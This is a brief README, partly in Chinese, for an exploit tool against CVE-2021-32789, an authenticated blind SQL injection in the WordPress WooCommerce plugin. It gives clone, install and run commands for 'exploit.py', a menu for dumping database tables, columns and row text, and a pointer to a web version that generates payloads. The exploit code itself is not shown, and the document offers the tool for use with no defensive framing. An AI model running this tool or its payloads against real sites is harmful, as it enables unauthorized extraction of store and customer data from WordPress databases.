认证盲SQL注入。WordPress woocommerce插件版本 >= 2.5.0
git clone https://github.com/DonVorrin/CVE-2021-32789.git
cd CVE-2021-32789
sudo pip install -r requirements.txt
python3 exploit.py
Enter URL: (Example: http://exploit.cve/)
Enter number:
1 - Output tables |
2 - Output tables + columns |
3 - Output text (need use number tabels) <-
为方便起见,从数据库单行输出。
建议使用Web版本,独立生成payload。
(参见------FOR BROWSER URL------)